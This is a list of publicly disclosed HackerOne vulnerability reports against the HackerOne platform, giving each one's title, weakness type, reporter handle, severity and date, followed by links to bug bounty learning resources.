| Residual Malicious Payloads on HackerOne after Vulnerability Fixes |
Improper Input Validation |
joejoe5 |
Medium |
2026-04-16 |
| DOS via Mutation Aliasing in GraphQL Account Recovery Phone Number Verification API |
None supplied |
hellokbit |
No rating |
2026-04-16 |
| Lack of Validation in Reward Redemption Allows Unlimited Burp Suite License Abuse |
Improper Access Control - Generic |
theokeen |
Low |
2026-03-18 |
| Internal Access to Hackerone confluence Docs |
Misconfiguration |
madara_ |
High |
2025-08-15 |
| Account takeover of existing HackerOne accounts through SCIM provisioning |
Improper Access Control - Generic |
boy_child_ |
High |
2025-07-17 |
| Banned user still has access to their deleted account via HackerOne's API using their API key |
Improper Access Control - Generic |
mrmax4o4 |
Medium |
2025-07-14 |
| IDOR Vulnerability at AddTagToAssets operation name |
Insecure Direct Object Reference (IDOR) |
root_geek280 |
Medium |
2025-06-08 |
| Public GitHub repositories for multiple HackerOne managed triage team profiles contain private HackerOne reports information |
Information Disclosure |
w2w |
Medium |
2025-05-31 |
| Ability to access policy and updates for unauthorized program |
Improper Access Control - Generic |
light3r |
Medium |
2025-05-08 |
| The /reports/:id.json endpoint discloses potentially sensitive user attributes when reporter summary is present |
Information Disclosure |
avinash_ |
Critical |
2025-04-01 |
| Domain highlighting on External link warning is not working on Chrome & Microsoft Edge browsers on Mobile |
Violation of Secure Design Principles |
sarthakbhingare015 |
Low |
2025-03-13 |
| Disclosing PolicyPageAssetGroup in Private Programs via /graphql `gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/{id}` |
None supplied |
haxta4ok00 |
Critical |
2025-01-21 |
| Access to limited confidential information of private program as a Ex-reporter, Report Participant(external user) & Ex-staff member |
Improper Access Control - Generic |
sarthakbhingare015 |
Low |
2024-12-24 |
| Hackerone supports accounts organitation takeover |
None supplied |
madara_ |
Medium |
2024-11-19 |
| Takeover of hackerone.engineering via Medium |
Reliance on Reverse DNS Resolution for a Security-Critical Action |
raditz |
Low |
2024-11-14 |
| Bypassing HackerOne 2FA due to race condition |
Business Logic Errors |
akashhamal0x01 |
Medium |
2024-10-30 |
| inviting collaborator using email disclose the hackerone account related to the user |
Information Disclosure |
raymatp |
Medium |
2024-09-19 |
| Issue with VDP Program's Transition to Private Status and Missing Warning Labels on ORG Invitation |
None supplied |
harshdranjan |
Medium |
2024-09-19 |
| Bypass comment restriction |
Improper Access Control - Generic |
retat4 |
Medium |
2024-09-19 |
| Private draft report exposure in a program a user is added as a viewer to |
Information Disclosure |
jay |
Medium |
2024-09-17 |
| Private data related to program exposed via /reports/<id>.json endpoint to external user participant |
Information Disclosure |
saurabhb |
Medium |
2024-08-30 |
| Payload delivery via Social Media urls on H1 profile |
Remote File Inclusion |
tedix |
Medium |
2024-07-23 |
| Non Org Admin/Group Manager can create groups in an organization |
Privilege Escalation |
akashhamal0x01 |
High |
2024-07-23 |
| Minor security issue with Hackerone Invitations from sandbox program |
Business Logic Errors |
iam_srpk |
Low |
2024-07-22 |
| TOTP Authenticator implementation Accepts Expired Codes |
Improper Authentication - Generic |
noob_but_cut3 |
High |
2024-07-11 |
| Reports submitted by a non 2fa setupped user account can be transferred to a 2fa require submission program |
Improper Access Control - Generic |
aloneh1 |
Low |
2024-07-11 |
| 2fa can't be activated on app.pullrequest.com |
Violation of Secure Design Principles |
iam_srpk |
None |
2024-07-11 |
| Two factor authentication bypass |
None supplied |
pranshux0x_ |
Medium |
2024-07-11 |
| Session Not Expire / 2FA Bypass |
Insufficient Session Expiration |
blackflyhunter |
Medium |
2024-07-11 |
| 2FA Bypass via Leaked Cookies |
Improper Authentication - Generic |
deepmarketer |
Medium |
2024-07-11 |
| Two-factor authentication bypass lead to information disclosure about the program and all hackers participate |
Information Disclosure |
bob004x |
High |
2024-07-11 |
| Reset the 2FA of the user which can lead to Account Takeover |
Improper Access Control - Generic |
5zdob13 |
Medium |
2024-07-11 |
| Bypassing the victim's phone number OTP in the account recovery process on the https://hackerone.com/settings/auth/setup_account_recovery |
Improper Authentication - Generic |
the-white-evil |
Critical |
2024-07-11 |
| 2FA requirement bypass when claiming bounty |
Business Logic Errors |
raymatp |
No rating |
2024-07-11 |
| Improper Authentication - 2FA OTP Reusable |
Improper Authentication - Generic |
xklepxn |
High |
2024-07-11 |
| Bypassing Two-Factor Authentication via Account Deactivation and Password Reset |
Improper Access Control - Generic |
011alsanosi |
None |
2024-07-11 |
| Business Logic error leads to bypass 2FA requirement |
Business Logic Errors |
abdulprkr |
High |
2024-07-11 |
| Hackers can Invite Collaborators Without 2FA on Programs Requiring 2FA |
None supplied |
anish-kosaraju |
Medium |
2024-07-11 |
| Ability to identify actual private from sandboxed programs using link hackerone.com/$handle/terms_acceptance_data.csv |
Improper Access Control - Generic |
ketr0it |
Medium |
2024-06-20 |
| Program Member Could Duplicate Report To A Non Related Program Original Report |
Improper Access Control - Generic |
v0id1 |
High |
2024-06-19 |
| "package_name" can be set as desired when submitting a Pentest Opportunity form |
Improper Access Control - Generic |
iam_srpk |
Medium |
2024-06-19 |
| [IDOR] Improper Access Control on Embedded Submission Form |
Insecure Direct Object Reference (IDOR) |
japz |
Low |
2024-06-19 |
| Ability to bulk submit reports via query named based batching |
Violation of Secure Design Principles |
0x999 |
Low |
2024-06-19 |
| Access Control Vulnerability Enabling Unauthorized Access to Limited Disclosure Reports |
Improper Access Control - Generic |
akashhamal0x01 |
High |
2024-06-17 |
| [Spot Check] - Ability to disclose metadata about Spot Checks (Number of Hackers + Hackers Criteria) via "SpotCheckSingleQuery" |
Information Disclosure |
nagli |
Medium |
2024-06-11 |
| [ Spot Check ] Team members can edit a user's write-up |
Improper Access Control - Generic |
youstin |
Low |
2024-06-06 |
| [hackerone.com] Program's old handles are not blacklisted like usernames and allows reclaim over past handles for potential abuse |
Violation of Secure Design Principles |
zy9ard3 |
Medium |
2024-05-30 |
| LLM03: Training Data Poisoning via ASCII decoding |
LLM01: Prompt Injection |
hacktus |
None |
2024-05-28 |
| Inadequate redaction exposes sensitive information via the “ShareReportViaEmail" GraphQL endpoint |
None supplied |
iambouali |
Medium |
2024-05-24 |
| Insecure Direct Object Reference (IDOR) Allows Viewing Private Report Details via /bugs.json Endpoint |
Insecure Direct Object Reference (IDOR) |
bate5a |
Critical |
2024-05-23 |
| Able to Create Testimonials for myself using Sandbox |
Improper Access Control - Generic |
harshdranjan |
Medium |
2024-05-22 |
| Any user could upload attachments to pentest scoping form they don't have access to |
Business Logic Errors |
hillybott |
High |
2024-05-15 |
| LLM01: Invisible Prompt Injection |
LLM01: Prompt Injection |
hacktus |
Medium |
2024-05-13 |
| Possible PII Disclosure via Advanced Vetting Process - ██████ |
Information Disclosure |
darkc0d3 |
Medium |
2024-05-13 |
| Cloud Computer Hackerone Triager can be Accessible for everyone [[email protected]] computer |
Business Logic Errors |
lu3ky-13 |
None |
2024-05-10 |
| Confirmed #2118458: Intentional redirect from www.hackerone.com to domain which is up for sale |
None supplied |
sarthakbhingare015 |
Low |
2024-05-09 |
| Attachment disclosure via summary report |
Insecure Direct Object Reference (IDOR) |
xklepxn |
Critical |
2024-04-29 |
| New Hacktivity features:Bounty rewards leakage Where programs doesn’t decide to disclose bounty in limited disclosure report |
Information Disclosure |
nitsec7 |
Medium |
2024-03-28 |
| Creation of bounties through Customer API leads to private email disclosure |
Information Disclosure |
0v3rw4tch |
Critical |
2024-03-26 |
| View any user email using the Team's audit log section |
Information Disclosure |
0v3rw4tch |
Critical |
2024-03-26 |
| Being able to disclose IBB bounty table of any public program |
Information Disclosure |
akashhamal0x01 |
Medium |
2024-03-17 |
| Program admins could add verified domains to an organization |
Improper Access Control - Generic |
hillybott |
Low |
2024-03-07 |
| Account creation with invalid email addresses / email is accepting % and %0d%0a line termination chars |
Violation of Secure Design Principles |
resett3r |
Low |
2024-02-04 |
| HackerOne SAML signup domain enforcement bypass results in unauthorized access to HackerOne PullRequest organization |
Improper Null Termination |
0xacb |
High |
2024-02-04 |
| Server Side Request Forgery (SSRF) in webhook functionality |
Server-Side Request Forgery (SSRF) |
madara_ |
Medium |
2024-01-30 |
| Some limited confidential information can still be accessed after a user exits a private program |
Information Disclosure |
brazil1 |
Medium |
2024-01-19 |
| View Titles of Private Reports with pending email invitation |
Improper Access Control - Generic |
ahacker1 |
High |
2024-01-16 |
| An attacker can submit a Pentest Opportunity and change the status of the opportunity from submitted to in_review or reviewed |
Improper Access Control - Generic |
marvelmaniac |
Medium |
2024-01-04 |
| How the Arch Angel stole Live Events |
None supplied |
archangel |
None |
2023-12-15 |
| Server Side Request Forgery (SSRF) via Analytics Reports |
Server-Side Request Forgery (SSRF) |
hacker1_agent |
Critical |
2023-12-08 |
| Private program name disclosure in the invitation mail for another program |
Information Disclosure |
byq |
Low |
2023-12-08 |
| Organization members can delete reports in teams they have no access to |
Improper Access Control - Generic |
0v3rw4tch |
Medium |
2023-11-22 |
| Google Docs link in JS files allows editing & reading survey information |
Information Disclosure |
bebiks |
Medium |
2023-11-04 |
| Bypass report submit restriction/ban using the API key |
Privilege Escalation |
light3r |
Medium |
2023-10-29 |
| IDOR vulnerability in unreleased HackerOne Copilot feature |
Insecure Direct Object Reference (IDOR) |
bebiks |
Medium |
2023-10-25 |
| New Search Feature: Search for non-public words in limited disclosure reports |
Information Disclosure |
ahacker1 |
Medium |
2023-10-25 |
| Hacker email disclosed on submission at hackerone hactivity |
Information Disclosure |
xdemiray |
Low |
2023-10-24 |
| Hackers two email disclosed on submission at hackerone hactivity |
Information Disclosure |
inscryption |
No rating |
2023-10-18 |
| Draft report exposure via slack alerting system for programs |
Information Disclosure |
imranhudaa |
Medium |
2023-10-06 |
| Able to see Bonus amount given to a report even if the bounty and Bonus is not visible to public or mentioned in {Report-Id}.json |
Information Disclosure |
harshdranjan |
Medium |
2023-09-14 |
| IDOR: Authorization Bypass in LockReport Mutation for public reports |
Improper Access Control - Generic |
0v3rw4tch |
Medium |
2023-09-13 |
| Unauthorized Ticket can be created by an Attacker in user's Helpdesk account |
None supplied |
fanimalikhack |
None |
2023-09-08 |
| Support Tickets can be created on behalf of other users using spoofed email | Bypass of #2001913 |
Incorrect Authorization |
as_patro |
None |
2023-09-08 |
| Triager/Team members can edit hacker's report and hacker is not even notified |
None supplied |
kalkii |
Medium |
2023-08-31 |
| Names not completely redacted despite "Redact the names of the involved users" is selected |
Information Disclosure |
japz |
Low |
2023-08-29 |
| IDOR - Delete all Licenses and certifications from users account using CreateOrUpdateHackerCertification GraphQL query |
Insecure Direct Object Reference (IDOR) |
harshdranjan |
High |
2023-08-29 |
| Staff and Triage can modify the initial post of a report, including of already disclosed reports |
Improper Access Control - Generic |
zerotea |
Medium |
2023-08-28 |
| Bypass of #2035332 RXSS at image.hackerone.live via the `url` parameter |
Cross-site Scripting (XSS) - Reflected |
sudi |
Low |
2023-08-22 |
| Hackerone All Private Program Name Leaked to Public Via Collaborator OR Attacker can Easily Dump all Private Program Names through Collaborator |
Information Disclosure |
hackit_bharat |
Medium |
2023-08-11 |
| RXSS at image.hackerone.live via the `url` parameter |
Cross-site Scripting (XSS) - Reflected |
todayisnew |
Low |
2023-08-11 |
| Create miscellaneous support ticket on anyone's account through [email protected] email |
Misconfiguration |
sayaanalam |
None |
2023-08-11 |
| HackerOne Support System Doesn't Require Any Authentication May Lead Unauthorized Action |
Misconfiguration |
rafsanzami |
None |
2023-08-11 |
| Usernames still visible on report export pdf despite "I want to redact all usernames" is selected |
Information Disclosure |
japz |
Low |
2023-08-08 |
| Takeover of hackerone.engineering via Github |
Privilege Escalation |
m0chan |
Medium |
2023-07-31 |
| Register & create a ticket as somebody else on HackerOne Support |
Misconfiguration |
slothzap |
None |
2023-07-31 |
| Asset Inventory Internal Descriptions are leaked in CSV export |
Business Logic Errors |
archangel |
Medium |
2023-07-12 |
| 2M Reports on HackerOne Celebration! - Ability to bulk-submit many reports. |
Misconfiguration |
nagli |
Low |
2023-07-11 |
| Banned user still able to invited to reports as a collabrator and reset the password |
Improper Access Control - Generic |
light3r |
Medium |
2023-07-06 |
| Internal machine learning API endpoint for CWE classification is vulnerable to path traversal |
Path Traversal |
jobert |
Medium |
2023-07-05 |
| An attacker can can view any hacker email via /SaveCollaboratorsMutation operation name |
Information Disclosure |
0xrayan1996 |
High |
2023-07-04 |
| Improper CSRF token validation allows attackers to access victim's accounts linked to Hackerone |
Cross-Site Request Forgery (CSRF) |
medmahmoudi |
High |
2023-06-19 |
| Attachment in published HackerOne report exposure private program |
Information Disclosure |
mateuszek |
Low |
2023-06-07 |
| Any one can view collaborater email address via path /reports/<id>/participants |
Improper Access Control - Generic |
aloneh1_breecher |
Low |
2023-06-01 |
| Program managers can see draft reports using Export Reports feature |
Business Logic Errors |
alp |
Low |
2023-05-18 |
| HTML injection in email at https://www.hackerone.com/ |
Code Injection |
iamr0000t |
Low |
2023-05-12 |
| Insecure Direct Object Reference (IDOR) - Delete Campaigns |
Insecure Direct Object Reference (IDOR) |
datph4m |
High |
2023-05-03 |
| adding h1_analyst_* to username for normal users |
Business Logic Errors |
refaat01 |
Low |
2023-04-12 |
| [CVE-2022-44268] Arbitrary Remote Leak via ImageMagick |
Remote File Inclusion |
mikkocarreon |
Critical |
2023-03-16 |
| information disclosure of another company bug on video. |
Information Disclosure |
mundre_07 |
Low |
2023-03-12 |
| Stored XSS on www.hackerone.com due to deleted S3-bucket from old page_widget |
Cross-site Scripting (XSS) - Stored |
fransrosen |
Medium |
2023-03-10 |
| Scope information is leaked when visiting policy scopes tab of any External Program |
Improper Access Control - Generic |
buraaqsec |
Medium |
2023-03-10 |
| SQL Injection in CVE Discovery Search |
SQL Injection |
rcoleman |
High |
2023-03-06 |
| Users querying dim_hacker_reports table through Analytics API can determine data from dim_reports table using WHERE or HAVING query |
Information Disclosure |
jobert |
Medium |
2023-02-22 |
| HTML injection that may lead to XSS on HackerOne.com through H1 Triage Wizard Chrome Extension |
Cross-site Scripting (XSS) - Stored |
jobert |
Low |
2023-02-14 |
| HackerOne Undisclosed Report Leak via PoC of Full Disclosure on Hacktivity |
Information Disclosure |
syjane |
Low |
2023-02-10 |
| Private information exposed through GraphQL search endpoints aggregates |
Information Disclosure |
reigertje |
Medium |
2023-01-19 |
| Race condition in joining CTF group |
Time-of-check Time-of-use (TOCTOU) Race Condition |
zeyu2001 |
Low |
2023-01-08 |
| Any organization's assets pending review can be downloaded |
Information Disclosure |
jobert |
High |
2022-11-29 |
| HTML Injection in email via Name field |
Cross-site Scripting (XSS) - Generic |
hacker1_agent |
Low |
2022-09-18 |
| Ability to escape database transaction through SQL injection, leading to arbitrary code execution |
SQL Injection |
jobert |
High |
2022-08-09 |
| June 2022 Incident Report |
None supplied |
jobert |
Critical |
2022-07-01 |
| Blind XSS in app.pullrequest.com/████████ via /reviews/ratings/{uuid} |
Cross-site Scripting (XSS) - Generic |
bugra |
High |
2022-05-25 |
| An attacker can archive and unarchive any structured scope object on HackerOne |
None supplied |
ahacker1 |
High |
2022-04-18 |
| [Bypass] Ability to invite a new member in sandbox Organization |
Business Logic Errors |
0619 |
Medium |
2022-04-14 |
| Private invitation links/tokens leak to third-party analytics site |
Information Disclosure |
bigbug |
Low |
2022-04-05 |
| Attachment references in markdown don't warn before downloading |
Open Redirect |
iamr0000t |
Low |
2022-02-25 |
| Static files on HackerOne.com can be made inaccessible through Cache Poisoning attack |
Uncontrolled Resource Consumption |
youstin |
Medium |
2021-12-22 |
| Leaked H1's Employees Email addresses,meeting info on private bug bounty program ████████ |
Information Disclosure |
superman85 |
Medium |
2021-11-08 |
| HackerOne Staging uses Production data for testing |
Privacy Violation |
tk0 |
Low |
2021-11-05 |
| Temporary banned user (from platform) is able to make submissions via embedded submission forms |
Business Logic Errors |
muon4 |
Low |
2021-09-22 |
| CSV injection in the credentials export |
Violation of Secure Design Principles |
muon4 |
None |
2021-09-22 |
| Race condition allows to send multiple times feedback for the hacker |
Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') |
muon4 |
Low |
2021-09-22 |
| User's who are banned from program can still be invited to the new reports as collaborators |
Business Logic Errors |
muon4 |
Low |
2021-09-22 |
| Used email confirmation link reveals the email address which is tied to it |
Information Disclosure |
muon4 |
None |
2021-09-22 |
| Hacker can bypass minimum bounty amount restrictions in "invitation preferences" setting via UpdateInvitationPreferencesMutation GraphQL operation |
Client-Side Enforcement of Server-Side Security |
frozensolid |
Low |
2021-09-20 |
| Enumerating HackerOne Pentests |
Misconfiguration |
whhackersbr |
Low |
2021-08-25 |
| Disclosure handle private program with external link |
None supplied |
haxta4ok00 |
Medium |
2021-08-24 |
| Attachment object in GraphQL continues to grant access to files, even if they are removed from rendering |
Information Disclosure |
haxta4ok00 |
Medium |
2021-08-24 |
| Hackers can find out the ID of private programs |
Information Disclosure |
haxta4ok00 |
Low |
2021-08-24 |
| The possibility of disrupting the normal operation of frontend using markdown |
Denial of Service |
haxta4ok00 |
Low |
2021-08-24 |
| Hackers can reveal the names of private programs that have an external link |
Information Disclosure |
haxta4ok00 |
Low |
2021-08-24 |
| Hackers can reveal the names of private programs that have an external link and Enterprise Product Edition |
Information Disclosure |
haxta4ok00 |
Low |
2021-08-24 |
| Tab nabbing in Hackerone inbox. |
Open Redirect |
adhamsadaqah |
Low |
2021-08-09 |
| PII data Leakage through hackerone reports |
Information Disclosure |
iamr0000t |
Low |
2021-08-09 |
| Partial report contents leakage - via HTTP/2 concurrent stream handling |
Information Disclosure |
tomvg |
Medium |
2021-08-05 |
| Private program disclosure through notifications |
Improper Access Control - Generic |
sunil_yedla |
Low |
2021-08-05 |
| Mishandling of hackerone clear background checks resulting in disclosure of other hacker's information |
Off-by-one Error |
frozensolid |
Medium |
2021-08-05 |
| Internal Gitlab Ticket Disclosure via External Slack Channels |
Information Disclosure |
none_of_the_above |
High |
2021-08-04 |
| Information disclosure - Feedback is accessible on Public profile even after 'disallowed' at https://hackerone.com/settings/feedback |
Information Disclosure |
brdoors3 |
Low |
2021-08-03 |
| Slack integration setup lacks CSRF protection |
Cross-Site Request Forgery (CSRF) |
whhackersbr |
High |
2021-07-07 |
| New link opening method makes hackerone vulnerable to tabnabbing |
Open Redirect |
recon_ninja |
Low |
2021-07-07 |
| Report Bulk endpoint "agree-on-going-public" action may reveal Report disclosure state for invite-only programs |
Information Disclosure |
clubbable |
Low |
2021-06-30 |
| Report Duplicate Detector can match deleted and draft reports, may disclose title and vulnerability information |
Information Disclosure |
jobert |
Low |
2021-06-24 |
| Stored XSS in IE11 on hackerone.com via custom fields |
Cross-site Scripting (XSS) - Stored |
tester2020 |
Medium |
2021-06-24 |
| Second-order SOQL injection through email and campaign name parameter in Salesforce lead submission |
None supplied |
jobert |
Low |
2021-06-18 |
| HackerOne making payments in USDC (Coinbase stable coin) |
None supplied |
arl_rose |
None |
2021-06-17 |
| Hackerone is not properly deleting user id |
Business Logic Errors |
hack3r_anies |
Medium |
2021-06-11 |
| Private program disclosure of `██████████` through notifications |
Improper Access Control - Generic |
h13- |
Low |
2021-06-09 |
| CSRF allows to test email forwarding |
Cross-Site Request Forgery (CSRF) |
muon4 |
Low |
2021-05-13 |
| Lack warning label when receiving a letter |
Phishing |
haxta4ok00 |
Low |
2021-05-13 |
| Bypassing the External Link Warning |
Open Redirect |
whhackersbr |
Low |
2021-05-07 |
| Editing Pentest Summary Report Answers After Submitting Them |
Modification of Assumed-Immutable Data (MAID) |
whhackersbr |
Low |
2021-05-06 |
| Changing the 2FA secret key and backup codes without knowing the 2FA OTP |
Modification of Assumed-Immutable Data (MAID) |
whhackersbr |
Medium |
2021-05-06 |
| Improper data update process on UpdatePhabricatorIntegration mutation leads to leak of Phabricator Conduit API token. |
Information Disclosure |
nukedx |
Critical |
2021-04-30 |
| Ability to invite a new member on Sandbox Program |
Business Logic Errors |
ex1st3nc3_ |
Low |
2021-04-05 |
| HackerOne Jira integration plugin Leaked JWT to unauthorized jira users |
Improper Authentication - Generic |
updatelap |
Medium |
2021-04-01 |
| HackerOne Jira integration plugin Leaked JWT to unauthorized jira users |
Improper Authentication - Generic |
updatelap |
Medium |
2021-04-01 |
| Reflected XSS and possible SSRF/XXE on https://events.hackerone.com/conferences/get_recording_slides_xml.xml?url=myserver/xss.xml |
Cross-site Scripting (XSS) - Reflected |
nagli |
None |
2021-03-26 |
| Stored XSS on https://events.hackerone.com |
Cross-site Scripting (XSS) - Stored |
nagli |
None |
2021-03-26 |
| Open Redirect on http://events.hackerone.com/redirect?url=https://naglinagli.github.io |
Open Redirect |
nagli |
None |
2021-03-26 |
| Indexing of urls on the "External link warning" pages discloses many vulnerable endpoints from the past and unlisted videos/photos |
Violation of Secure Design Principles |
nagli |
Medium |
2021-03-25 |
| Stored Cross-Site Scripting vulnerability in example Custom Digital Agreement |
Cross-site Scripting (XSS) - Stored |
jobert |
Medium |
2021-03-18 |
| "Bounty splitting enabled" can discloses if public VDPs are running private VRP |
None supplied |
hundredpercent |
Low |
2021-03-18 |
| Dangling cloud instance at vpn.inverselink.com |
Business Logic Errors |
ian |
Low |
2021-03-11 |
| Security@ email forwarding and Embedded Submission drafts can be used to obtain copy of deleted attachments from other HackerOne users |
Insecure Direct Object Reference (IDOR) |
jobert |
High |
2020-11-17 |
| Getting New Invitations without Leaving Programs |
Business Logic Errors |
ali |
Low |
2020-10-15 |
| Email address of any user can be queried on Report Invitation GraphQL type when username is known |
Improper Authorization |
msdian7 |
High |
2020-02-20 |
| Account takeover via leaked session cookie |
Improper Authentication - Generic |
haxta4ok00 |
High |
2019-12-03 |
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles